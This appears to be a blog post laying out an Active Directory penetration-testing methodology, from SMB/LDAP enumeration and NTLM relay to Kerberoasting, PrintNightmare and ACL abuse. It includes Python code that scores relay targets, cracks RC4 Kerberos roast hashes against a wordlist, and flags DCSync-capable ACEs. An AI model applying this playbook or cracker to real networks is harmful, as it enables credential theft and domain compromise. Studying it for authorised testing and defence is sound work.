Active Directory Attack Methodology

R3zk0n · October 2, 2025

Contents

    Low Hanging Fruit

    • Standard Infrastructure penetration testing of the network
    • Check for null-session and Guest access on SMB (common on older Windows versions and on misconfigured shares)
    • Enumerate SMB
    • Enumerate LDAP
    • Network Poisoning (LLMNR, NBT-NS, mDNS)
      • https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks
    • evil-SSDP (UPnP spoofing)
    • OSINT (harvest employee names, work out the username format)
    • Steal NTLM creds (if you already have a foothold on a server, coerce it into authenticating to your Responder listener, e.g. via a UNC path, then crack or relay the Net-NTLM hash)

    If NO USERNAME

    • Anonymous SMB/LDAP enum
    • Kerbrute userenum (username enumeration over Kerberos: the KDC answers an AS-REQ differently for valid and unknown principals, and the probe does not increment badPwdCount)
    • OWA (Outlook Web Access): user enumeration and a password-spraying target

    If USERNAME

    • ASREPRoast (accounts with "Do not require Kerberos preauthentication" set: request an AS-REP for the user and crack it offline)
    • Password Spraying (one or two likely passwords across many users, staying under the lockout threshold)
    • NTLM Relay attack (works against hosts where SMB signing is not required)
      • https://www.qomplx.com/qomplx-knowledge-ntlm-relay-attacks-explained/
      • https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0
    • Steal NTLM Creds

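Whether relay is an option depends on one field of the target's SMB2 NEGOTIATE response, the SecurityMode flags. The following added example (not code from the original post) builds a constructed NEGOTIATE response and parses it the way a signing scanner does; the sample frame, GUID and size values are made up, and the same check decides the relay item that reappears under CREDENTIALS + SESSION.

```python
"""Decide from an SMB2 NEGOTIATE response whether a host is an NTLM-relay target.
NTLM relay to SMB only works when the server does not REQUIRE signing."""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}
HEADER_FMT = "<4sHHIHHIIQIIQ16s"    # 64-byte SMB2 header (MS-SMB2 2.2.1.2)
NEG_RESP_FMT = "<HHHH16sIIIIQQHHI"  # fixed 64 bytes of the NEGOTIATE response (MS-SMB2 2.2.4)


def build_negotiate_response(security_mode, dialect=0x0302):
    """Constructed server reply used as sample input (no real SMB traffic involved)."""
    header = struct.pack(HEADER_FMT, SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(NEG_RESP_FMT, 65, security_mode, dialect, 0, b"\x11" * 16,
                       0x2F, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    # prepend the 4-byte NetBIOS session header that precedes SMB on tcp/445
    return struct.pack(">I", len(header + body)) + header + body


def parse_negotiate_response(frame):
    """Return the signing posture of the server that sent this NEGOTIATE response."""
    if len(frame) >= 8 and frame[0] == 0 and frame[4:8] == SMB2_MAGIC:
        frame = frame[4:]  # strip the NetBIOS session header
    if len(frame) < 128 or frame[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 frame")
    (_, hdr_size, _, status, command, _, flags, *_) = struct.unpack(HEADER_FMT, frame[:64])
    if hdr_size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    if status != 0:
        raise ValueError(f"NEGOTIATE failed with NTSTATUS 0x{status:08x}")
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", frame, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response structure size")
    required = bool(security_mode & SIGNING_REQUIRED)
    return {
        "dialect": DIALECTS.get(dialect, hex(dialect)),
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": required,
        "relay_target": not required,  # ntlmrelayx can relay SMB authentication here
    }


if __name__ == "__main__":
    for mode in (SIGNING_ENABLED, SIGNING_ENABLED | SIGNING_REQUIRED):
        print(parse_negotiate_response(build_negotiate_response(mode)))
```

"Enabled" is not "required": member servers and workstations historically default to signing enabled but not required, while domain controllers require it, so the DC is usually not the relay target even though the coerced authentication may come from it. A host that requires SMB signing can still be relayed to other services (LDAP without signing or channel binding, HTTP) when those are exposed.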
    If CREDENTIALS + SESSION

    • ASREPRoast (now query LDAP for every account with preauthentication disabled, instead of guessing usernames)
    • Password Spraying (the full user list is available now, so spray a wider scope, still under the lockout threshold)
    • Basic recon
      • CMD: https://book.hacktricks.xyz/windows-hardening/basic-cmd-for-pentesters#domain-info
      • Powershell: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters
      • Powerview: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
      • Bloodhound + Other tools: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/bloodhound
    • Other recon: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
    • Remote connection to other machines
    • Local privilege escalation (then dump credentials from LSASS, SAM and LSA secrets)
    • Kerberoast (request service tickets for accounts that have an SPN and crack them offline; any domain account can request them)
    • Reuse tickets already cached in the current session (rarely yields much)
    • NTLM Relay attack (hosts where SMB signing is not required)
    • Look for credentials in network shares (SMB)
    • Steal NTLM Creds
    • CVE-2021-1675/CVE-2021-34527 PrintNightmare (any authenticated domain user to SYSTEM on an unpatched host running the Print Spooler, domain controllers included)

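ASREPRoast and Kerberoast are listed as offline attacks because the material the KDC hands out is encrypted under a key derived from the account's password: for etype 23 that key is the NT hash itself. The following added example (not code from the original post, and not what hashcat or impacket actually run) implements the per-candidate check a cracker performs on $krb5asrep$23$ and $krb5tgs$23$ lines, with a constructed generator that produces sample lines in the format impacket's GetNPUsers.py and GetUserSPNs.py print. The usernames, realm, passwords and the placeholder plaintext are made up; MD4 is implemented inline because hashlib often lacks it on modern OpenSSL builds.

```python
"""Verify an RC4-HMAC (etype 23) roast hash against candidate passwords (RFC 4757)."""
import hashlib
import hmac
import os
import struct


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data):
    """Pure-Python MD4 (RFC 1320)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for f, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _lrot((a + f(b, c, d) + X[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# RFC 4757 key usage: the AS-REP enc-part (RFC 4120 usage 3) is mapped to 8; a ticket enc-part is 2.
KEY_USAGE = {"asrep": 8, "tgs": 2}


def rc4_hmac_encrypt(key, usage, confounder, plaintext):
    """RFC 4757 encryption; returns (checksum, edata), the two parts the hash line carries."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    cksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    return cksum, rc4(k3, confounder + plaintext)


def make_roast_line(kind, user, realm, password, spn="", plaintext=b"\x30\x82CONSTRUCTED"):
    """Constructed sample input in hashcat 18200 / 13100 format. The plaintext here stands in
    for the DER-encoded EncASRepPart / EncTicketPart a real KDC would encrypt."""
    cksum, edata = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE[kind], os.urandom(8), plaintext)
    if kind == "asrep":
        return f"$krb5asrep$23${user}@{realm}:{cksum.hex()}${edata.hex()}"
    return f"$krb5tgs$23$*{user}${realm}${spn}*${cksum.hex()}${edata.hex()}"


def parse_roast_line(line):
    """Return (key usage, checksum, edata) for a $krb5asrep$23$ or $krb5tgs$23$ line."""
    if line.startswith("$krb5asrep$23$"):
        usage, rest = KEY_USAGE["asrep"], line[len("$krb5asrep$23$"):].split(":", 1)[1]
    elif line.startswith("$krb5tgs$23$"):
        usage, rest = KEY_USAGE["tgs"], line[len("$krb5tgs$23$"):].rsplit("*$", 1)[1]
    else:
        raise ValueError("only RC4-HMAC (etype 23) roast hashes are handled here")
    cksum_hex, edata_hex = rest.split("$", 1)
    return usage, bytes.fromhex(cksum_hex), bytes.fromhex(edata_hex)


def check_password(line, password):
    """The per-candidate test: derive K1 from the NT hash, recover K3 from the checksum,
    decrypt, and see whether the HMAC over the plaintext matches the checksum."""
    usage, cksum, edata = parse_roast_line(line)
    k1 = hmac.new(nt_hash(password), struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    plain = rc4(k3, edata)  # 8-byte confounder followed by the ASN.1 structure
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), cksum)


def crack(line, wordlist):
    return next((pw for pw in wordlist if check_password(line, pw)), None)


if __name__ == "__main__":
    sample = make_roast_line("asrep", "svc_backup", "CORP.LOCAL", "Winter2025!")
    print(sample)
    print("cracked:", crack(sample, ["Summer2024", "Password1", "Winter2025!"]))
```

Two things the code makes visible: the only per-guess cost is one MD4 plus three HMAC-MD5 calls and one RC4 pass, which is why etype 23 material cracks fast and why AES-only service accounts (etype 17/18, PBKDF2-based) are a meaningful hardening step; and nt_hash() is the same value used by pass-the-hash and over-pass-the-hash, so a cracked roast and a dumped hash lead to the same place.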
    If PRIVILEGED CREDENTIALS + SESSION

    • Hash extraction (as local administrator)
    • Pass the Hash (authenticate over NTLM with the NT hash in place of the password)
    • Over Pass the Hash/Pass the Key (use the NT hash or AES key as the Kerberos key to request a TGT)
    • Pass the Ticket
    • Credential reuse (same local administrator password or hash across hosts)
    • MSSQL abuse & trusted links (xp_cmdshell, linked servers that run as a more privileged login)
    • Kerberos
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource-based Constrained Delegation
    • ACL Abuse
      • https://learn.microsoft.com/en-us/windows/win32/adschema/extended-rights
    • Print Spooler service abuse (PrinterBug/SpoolSample: coerce a DC or other server to authenticate to a host you control, typically one with unconstrained delegation)

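The ACL abuse item comes down to reading nTSecurityDescriptor and spotting ACEs that hand a non-admin principal control over an object: GenericAll, WriteDacl, WriteOwner, write to all properties, or specific extended rights such as the ones in the Microsoft reference linked above. The following added example (not code from the original post) parses an SDDL string and returns those ACEs; it is the same check that backs BloodHound's ACL edges, reduced to one function. The sample descriptor and its SIDs are constructed, and only three extended-right GUIDs are recognised.

```python
"""Flag abusable DACL entries in an SDDL security descriptor string."""
import re

# SDDL access-right abbreviations (generic/standard rights plus the DS-specific ones)
SDDL_RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x001, "DC": 0x002, "LC": 0x004, "SW": 0x008, "RP": 0x010,
    "WP": 0x020, "DT": 0x040, "LO": 0x080, "CR": 0x100,
}
GENERIC_ALL, WRITE_DAC, WRITE_OWNER = SDDL_RIGHTS["GA"], SDDL_RIGHTS["WD"], SDDL_RIGHTS["WO"]
WRITE_PROP, CONTROL_ACCESS = SDDL_RIGHTS["WP"], SDDL_RIGHTS["CR"]

# rightsGuid values of the extended rights that matter most for abuse
EXTENDED_RIGHTS = {
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(token):
    """'RPWPCR' -> access mask; SDDL may also carry a raw hex mask such as 0xf01ff."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    mask = 0
    for i in range(0, len(token), 2):
        mask |= SDDL_RIGHTS[token[i:i + 2]]  # KeyError surfaces an unknown abbreviation
    return mask


def dacl_aces(sddl):
    """Yield the ACEs of the D: component; fields are type;flags;rights;object;inherit-object;trustee."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # SIDs use 'S-', so 'S:' only starts the SACL
    for raw in ACE_RE.findall(dacl):
        f = raw.split(";")
        if len(f) < 6:
            raise ValueError(f"malformed ACE: ({raw})")
        yield {"type": f[0], "flags": {f[1][i:i + 2] for i in range(0, len(f[1]), 2)},
               "rights": parse_rights(f[2]), "object": f[3].lower(), "trustee": f[5]}


def abusable_aces(sddl, ignore_trustees=("DA", "EA", "BA", "SY")):
    """Return [(trustee, [reasons])] for allow ACEs that give control over the object."""
    findings = []
    for ace in dacl_aces(sddl):
        # skip deny ACEs, inherit-only ACEs (they do not apply to this object) and admin aliases
        if ace["type"] not in ("A", "OA") or "IO" in ace["flags"] or ace["trustee"] in ignore_trustees:
            continue
        r, obj, why = ace["rights"], ace["object"], []
        if r & GENERIC_ALL:
            why.append("GenericAll")
        if r & WRITE_DAC:
            why.append("WriteDacl")
        if r & WRITE_OWNER:
            why.append("WriteOwner")
        if r & WRITE_PROP and not obj:
            why.append("WriteAllProperties")
        if r & CONTROL_ACCESS:
            if not obj:
                why.append("AllExtendedRights")
            elif obj in EXTENDED_RIGHTS:
                why.append(EXTENDED_RIGHTS[obj])
        if why:
            findings.append((ace["trustee"], why))
    return findings


# Constructed sample descriptor for a domain object; the domain SIDs are made up.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"   # Domain Admins, full control: expected, ignored
    "(A;;RPLCLORC;;;AU)"                    # Authenticated Users, read only
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(A;;WD;;;S-1-5-21-1004336348-1177238915-682003330-1106)"
    "(OA;CIIO;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1107)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1108)"
)

if __name__ == "__main__":
    for trustee, reasons in abusable_aces(SAMPLE_SDDL):
        print(trustee, reasons)
```

Resolve the SIDs afterwards (a group SID is only interesting if you can become a member) and check them against the real admin groups rather than the short aliases the ignore list uses. DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain head, so a hit on only one of them is not yet a finding; WriteDacl on its own is, since the holder can grant themselves everything else.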